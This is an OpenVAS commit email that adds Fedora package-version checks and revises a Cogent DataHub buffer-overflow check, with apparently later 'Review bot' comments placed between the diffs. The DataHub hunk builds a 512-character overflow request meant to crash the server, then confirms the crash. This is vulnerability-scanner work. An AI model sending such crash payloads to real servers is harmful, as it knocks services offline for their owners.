[Openvas-commits] r11702 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Tue Sep 27 17:30:02 CEST 2011


Author: veerendragg
Date: 2011-09-27 17:29:53 +0200 (Tue, 27 Sep 2011)
New Revision: 11702

Added:
   trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl
   trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl
   trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl
   trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl
Log:
Added new plugins. Updated to detect latest version. Added application confirmation and updated code completely as the exploit was not working properly. Added new LSC plugins.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/ChangeLog	2011-09-27 15:29:53 UTC (rev 11702)
@@ -1,3 +1,31 @@
+2011-09-27  Veerendra G.G <veerendragg at secpod.com>
+
+	* scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl,
+	scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl,
+	scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl:
+	Added new plugins.
+
+	* scripts/gb_merak_mail_server_detect.nasl:
+	Updated to detect latest version.
+
+	* scripts/gb_cogent_datahub_unicode_bof_vuln.nasl,
+	scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl:
+	Added application confirmation and Updated code completely as exploit
+	was not working properly.
+
+	* scripts/gb_fedora_2011_9820_libsoup_fc14.nasl,
+	scripts/gb_fedora_2011_12698_cherokee_fc15.nasl,
+	scripts/gb_fedora_2011_3627_openldap_fc14.nasl,
+	scripts/gb_fedora_2011_12687_cherokee_fc14.nasl,
+	scripts/gb_fedora_2011_12145_qt_fc14.nasl,
+	scripts/gb_fedora_2011_11196_foomatic_fc15.nasl,
+	scripts/gb_fedora_2011_12614_quassel_fc15.nasl,
+	scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl,
+	scripts/gb_fedora_2011_12580_quassel_fc14.nasl,
+	scripts/gb_fedora_2011_12300_nss_fc14.nasl,
+	scripts/gb_fedora_2011_11205_foomatic_fc14.nasl:
+	Added new LSC plugins.
+
 2011-09-27  Henri Doreau <henri.doreau at greenbone.net>
 
 	* scripts/secpod_ms_win_media_player_detect_900173.nasl: Don't
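Review bot: the entry for gb_cogent_datahub_unicode_bof_vuln.nasl and secpod_metaserver_rt_multiple_dos_vuln.nasl says the code was rewritten because the exploit "was not working properly" but not what was wrong or what the new application confirmation checks, so a ChangeLog reader cannot tell whether detection results change. State the concrete change (for the Cogent check, that a `(domain "openvas-test")` probe is sent first and the script exits unless the server answers with success) and lowercase "Updated" mid-sentence.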
@@ -44,7 +72,7 @@
 	* scripts/gb_openssl_detect_lin.nasl: Updated regexp to produce a
 	valid CPE (avoid suffix letter duplication).
 
-2011-09-22  Veerendra G.G <veerendragg at secpod.com>,
+2011-09-22  Veerendra G.G <veerendragg at secpod.com>
 
 	* scripts/secpod_colasoft_capsa_snmp_dos_vuln.nasl,
 	scripts/secpod_google_chrome_mult_vuln_sep11_lin.nasl,

Modified: trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -86,6 +86,16 @@
   exit(0);
 }
 
+## Send normal request
+req = string('(domain "openvas-test")', raw_string(0x0a));
+send(socket:soc, data:req);
+res = recv(socket:soc, length:1024);
+
+## Confirm Application
+if('success "domain" "openvas-test"' >!< res){
+  exit(0);
+}
+
 ## Construct Attack Request
 attack =  crap(data: "a", length:512);
 req = string('(domain "', attack, '")', raw_string(0x0a),
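Review bot: the early `exit(0)` inside the `'success "domain" "openvas-test"' >!< res` block leaves `soc` open, while the later path calls `close(soc)` before finishing; add `close(soc);` before that `exit(0)` so both paths release the socket. Note also that `recv(socket:soc, length:1024)` may return NULL on timeout or a partial response, and both cases take the same silent exit; that is the safe default for a destructive check, but a one-line comment saying so would make the intent clear.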
@@ -96,7 +106,7 @@
 
 ## Sending Attack
 send(socket:soc, data:req);
-send(socket:soc, data:req);
+res = recv(socket:soc, length:1024);
 close(soc);
 
 sleep(5);
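Review bot: `res = recv(socket:soc, length:1024);` replaces the duplicated `send`, but in the visible context `res` is never examined before `close(soc)` and `sleep(5)`. If the recv exists only to let the server process the request before the reconnect check, say so in the comment (the `## Sending Attack` header no longer describes what this line does); otherwise either check `res` or drop the assignment.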

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for foomatic FEDORA-2011-11196
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863536);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"6.8");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-11196");
+  script_cve_id("CVE-2011-2924", "CVE-2011-2697", "CVE-2011-2923");
+  script_name("Fedora Update for foomatic FEDORA-2011-11196");
+  desc = "
+
+  Vulnerability Insight:
+  Foomatic is a comprehensive, spooler-independent database of printers,
+  printer drivers, and driver descriptions. This package contains
+  utilities to generate driver description files and printer queues for
+  CUPS, LPD, LPRng, and PDQ using the database (packaged separately).
+  There is also the possibility to read the PJL options out of PJL-capable
+  laser printers and take them into account at the driver description
+  file generation.
+  
+  There are spooler-independent command line interfaces to manipulate
+  queues (foomatic-configure) and to print files/manipulate jobs
+  (foomatic printjob).
+  The site http://www.linuxprinting.org/
+
+
+  Affected Software/OS:
+  foomatic on Fedora 15
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066208.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of foomatic");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC15")
+{
+
+  if(isrpmvuln(pkg:"foomatic", rpm:"foomatic~4.0.8~3.fc15", rls:"FC15"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file
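Review bot: the description text inside `desc` has a dangling fragment `The site http://www.linuxprinting.org/` just before `Affected Software/OS:` and a whitespace-only line after `file generation.`; the file also ends without a trailing newline (`\ No newline at end of file`). Since the same text appears in the fc14 twin, fix the generator template rather than the individual file.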

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for foomatic FEDORA-2011-11205
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863540);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"6.8");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-11205");
+  script_cve_id("CVE-2011-2924", "CVE-2011-2697", "CVE-2011-2923");
+  script_name("Fedora Update for foomatic FEDORA-2011-11205");
+  desc = "
+
+  Vulnerability Insight:
+  Foomatic is a comprehensive, spooler-independent database of printers,
+  printer drivers, and driver descriptions. This package contains
+  utilities to generate driver description files and printer queues for
+  CUPS, LPD, LPRng, and PDQ using the database (packaged separately).
+  There is also the possibility to read the PJL options out of PJL-capable
+  laser printers and take them into account at the driver description
+  file generation.
+
+  There are spooler-independent command line interfaces to manipulate
+  queues (foomatic-configure) and to print files/manipulate jobs
+  (foomatic printjob).
+
+  The site http://www.linuxprinting.org/
+
+
+  Affected Software/OS:
+  foomatic on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066225.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of foomatic");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"foomatic", rpm:"foomatic~4.0.8~3.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for qt FEDORA-2011-12145
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863543);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_xref(name: "FEDORA", value: "2011-12145");
+  script_cve_id("CVE-2010-1822", "CVE-2011-3194");
+  script_name("Fedora Update for qt FEDORA-2011-12145");
+  desc = "
+
+  Vulnerability Insight:
+  Qt is a software toolkit for developing applications.
+  
+  This package contains base tools, like string, xml, and network
+  handling.
+  
+  Affected Software/OS:
+  qt on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066209.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of qt");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"qt", rpm:"qt~4.7.4~2.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file
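Review bot: `cvss_base` 9.3 with `risk_factor` Critical is the highest severity in this commit, yet the Vulnerability Insight block only says what Qt is and never mentions what CVE-2010-1822 or CVE-2011-3194 affect, so the rendered report gives no hint why the result is Critical. Pull the advisory's problem description into the Insight text; there are also two whitespace-only lines inside `desc`.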

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for nss FEDORA-2011-12300
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863544);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-12300");
+  script_name("Fedora Update for nss FEDORA-2011-12300");
+  desc = "
+
+  Vulnerability Insight:
+  Network Security Services (NSS) is a set of libraries designed to
+  support cross-platform development of security-enabled client and
+  server applications. Applications built with NSS can support SSL v2
+  and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509
+  v3 certificates, and other security standards.
+
+
+  Affected Software/OS:
+  nss on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066221.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of nss");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"nss", rpm:"nss~3.12.10~4.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file
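Review bot: this check has neither `script_cve_id()` nor a `cvss_base` tag, unlike every other Fedora check in the commit, yet it is tagged `risk_factor` High and reports via `security_hole`. If the advisory lists CVEs, add them so that reports filtered by CVE do not miss this result; if it does not, the High rating needs a justification in the description.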

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for quassel FEDORA-2011-12580
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863539);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-12580");
+  script_cve_id("CVE-2011-3354");
+  script_name("Fedora Update for quassel FEDORA-2011-12580");
+  desc = "
+
+  Vulnerability Insight:
+  Quassel IRC is a modern, distributed IRC client,
+  meaning that one (or multiple) client(s) can attach
+  to and detach from a central core --
+  much like the popular combination of screen and a
+  text-based IRC client such as WeeChat, but graphical
+
+
+  Affected Software/OS:
+  quassel on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066250.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of quassel");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"quassel", rpm:"quassel~0.7.3~1.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file
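Review bot: `risk_factor` High is set without a `cvss_base` tag, whereas the foomatic, qt and rsyslog checks in this commit carry both; add the base score from the advisory so severity is derived consistently. The description also ends mid-sentence (`... such as WeeChat, but graphical` with no terminating period).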

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for quassel FEDORA-2011-12614
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863545);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-12614");
+  script_cve_id("CVE-2011-3354");
+  script_name("Fedora Update for quassel FEDORA-2011-12614");
+  desc = "
+
+  Vulnerability Insight:
+  Quassel IRC is a modern, distributed IRC client,
+  meaning that one (or multiple) client(s) can attach
+  to and detach from a central core --
+  much like the popular combination of screen and a
+  text-based IRC client such as WeeChat, but graphical
+
+
+  Affected Software/OS:
+  quassel on Fedora 15
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066265.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of quassel");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC15")
+{
+
+  if(isrpmvuln(pkg:"quassel", rpm:"quassel~0.7.3~1.fc15", rls:"FC15"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for rsyslog FEDORA-2011-12616
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863537);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_xref(name: "FEDORA", value: "2011-12616");
+  script_cve_id("CVE-2011-3200");
+  script_name("Fedora Update for rsyslog FEDORA-2011-12616");
+  desc = "
+
+  Vulnerability Insight:
+  Rsyslog is an enhanced, multi-threaded syslog daemon. It supports MySQL,
+  syslog/TCP, RFC 3195, permitted sender lists, filtering on any message part,
+  and fine grain output format control. It is compatible with stock sysklogd
+  and can be used as a drop-in replacement. Rsyslog is simple to set up, with
+  advanced features suitable for enterprise-class, encryption-protected syslog
+  relay chains.
+
+
+  Affected Software/OS:
+  rsyslog on Fedora 15
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066271.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of rsyslog");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC15")
+{
+
+  if(isrpmvuln(pkg:"rsyslog", rpm:"rsyslog~5.8.5~1.fc15", rls:"FC15"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for cherokee FEDORA-2011-12687
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863541);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-12687");
+  script_cve_id("CVE-2011-2190", "CVE-2011-2191");
+  script_name("Fedora Update for cherokee FEDORA-2011-12687");
+  desc = "
+
+  Vulnerability Insight:
+  Cherokee is a very fast, flexible and easy to configure Web Server. It supports
+  the widespread technologies nowadays: FastCGI, SCGI, PHP, CGI, TLS and SSL
+  encrypted connections, Virtual hosts, Authentication, on the fly encoding,
+  Apache compatible log files, and much more.
+
+
+  Affected Software/OS:
+  cherokee on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066257.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of cherokee");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"cherokee", rpm:"cherokee~1.2.99~1.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file
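Review bot: `script_cve_id("CVE-2011-2190", "CVE-2011-2191")` is present but no `cvss_base` accompanies `risk_factor` High; add the score so this check's severity comes from the same data as the other checks in the commit rather than a bare label.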

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for cherokee FEDORA-2011-12698
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
